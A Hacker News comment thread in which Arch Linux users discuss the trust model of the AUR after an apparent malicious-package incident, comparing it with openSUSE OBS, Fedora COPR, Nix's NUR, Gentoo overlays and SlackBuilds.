| ▲ | rvz 11 hours ago |
| Who still uses Arch btw after this? |
|
| ▲ | rcxdude 10 hours ago | parent | next [-] |
| The AUR has consistently had warnings around it of 'verify the PKGBUILD', far more so than any other package repository that allows anyone to sign up. Probably the only notable difference is the ease of taking over an orphaned package. |
|
| ▲ | zbentley 9 hours ago | parent | prev | next [-] |
| The AUR is not the Arch package manager or repository. The main Arch package repos are managed similarly to Debian, or Fedora, or whatever--caveat Arch's nature as a rolling release, but in terms of vetting and ownership/security, the approaches are similar. pacman installs from regular, real, vetted repositories by default. pacman will never install from the AUR. pacman is the official Arch package manager and the only one that is provided with the main Arch distribution/install instructions. The AUR is, as many others have pointed out, a deliberately un-vetted pile of random Git repos. Arch deliberately doesn't even ship with a default one-click installer for AUR packages; their published guidance is "git clone this stuff from wherever it's hosted and build it at your own risk". Plenty of third-party, non-Arch-blessed tools turn that into a one-click process, but it's not "part" of Arch itself--at least not any more than, like, curl | bash or directions on how to add rando websites to /etc/apt/sources.list.d is part of Debian and friends. I've used Arch as a daily driver for years. At peak, I've had five (5) total packages, with no transitives, installed from the AUR. Today I have one: sublime-text-4. It's perfectly possible--and extremely reasonable for many users, even power users--to live in an AUR-less world, or to use so few AUR packages that the guidance of "read what you're installing, doofus" is manageable and not onerous. |
|
| ▲ | anagram666 10 hours ago | parent | prev | next [-] |
| If you want something from the AUR, just don't be lazy, read the pkgbuild. |
|
| ▲ | QuaternionsBhop 9 hours ago | parent | prev | next [-] |
| I was not affected |
|
| ▲ | akerl_ 11 hours ago | parent | prev | next [-] |
| Is there another distro that has an equivalent of the AUR with handling you think is preferable? |
| |
| ▲ | dizhn 23 minutes ago | parent | next [-] | | Opensuse OBS. Tiny bit better because the build environment doesn't allow a network and binaries are not allowed as far as I know. Fedora has a similar thing COPR. Both of these support building packages for other distros as well as appimage, flatpak etc. With opensuse official packages also use the same infrastructure. It is actually quite fascinating and powerful. | |
| ▲ | orbital-decay 10 hours ago | parent | prev | next [-] | | AUR is fast and loose and doesn't do much "handling" by design, so it's hard to find any equivalent repo. But there's always a tradeoff between fresh (nixpkgs unstable, might be the closest) and tested (Debian). | | |
| ▲ | akerl_ 10 hours ago | parent [-] | | AUR isn't just the testing repo of Arch; it's explicitly just an open spot where anybody can put up "here's a PKGBUILD for folks". I don't see how it's like either the Nix or Debian examples. | | |
| ▲ | orbital-decay 10 hours ago | parent [-] | | Well, Nix has NUR which is a direct equivalent but it's not nearly as broadly used and I assume "here's a PKGBUILD for folks" is already too permissive for you if you're asking. There's no maintainer vetting process in nixpkgs as far as I know, anyone can own a bunch of packages. There are quality standards and it's not "here's a bunch of nix code for folks" but it's the next possible thing in the line after that. | | |
| ▲ | isityettime 2 hours ago | parent | next [-] | | The NUR was sort of convenient before flakes were a thing, but now that there's a really common convention for sharing Nix code few use it. I bet most people who came across Nix in the last 4 years have never even heard of it. | |
| ▲ | akerl_ 10 hours ago | parent | prev [-] | | It seems like you may have mistakenly inferred that I have issues with the AUR? I don't; I use Arch on 100% of my personal servers, have done so for something approaching 20 years, and don't see myself changing. But I treat the AUR for what it is: a place where anybody can say "here's a PKGBUILD for folks" and it's on me to evaluate it on its merits. I was legitimately asking the person upthread what other distro they felt had a better model for this kind of sharing, because they seemed to think this was a reason for Arch users to jump ship and I was curious what they thought would be the elements of a better system. |
|
|
| |
| ▲ | guilhas 10 hours ago | parent | prev | next [-] | | Gentoo But let's hope we get this solved, like peer review model, vouch, or something It is very good to be able to find build/install files for everything | | |
| ▲ | akerl_ 10 hours ago | parent [-] | | Gentoo's model appears to be basically the same? Like the AUR, anybody can submit basically anything they want. The requirements amount to containing valid packages, having a bugzilla account, and putting your package definitions in VCS somewhere. | | |
| ▲ | butterknife an hour ago | parent [-] | | In overlays that need to be explicitly enabled. Not as convenient as yay yolo. We can also add npm to package.mask. |
|
| |
| ▲ | dokyun 9 hours ago | parent | prev [-] | | SlackBuilds.org is pretty sensible. |
|
|
| ▲ | beej71 8 hours ago | parent | prev | next [-] |
| I do. I just keep reading the diffs on the PLGBUILDs. |
|
| ▲ | segfalt_ 10 hours ago | parent | prev | next [-] |
| I do, I'm just choosy about aur packages I use |
|
| ▲ | giancarlostoro 11 hours ago | parent | prev [-] |
| I still do, I just don't touch AURs anymore. |
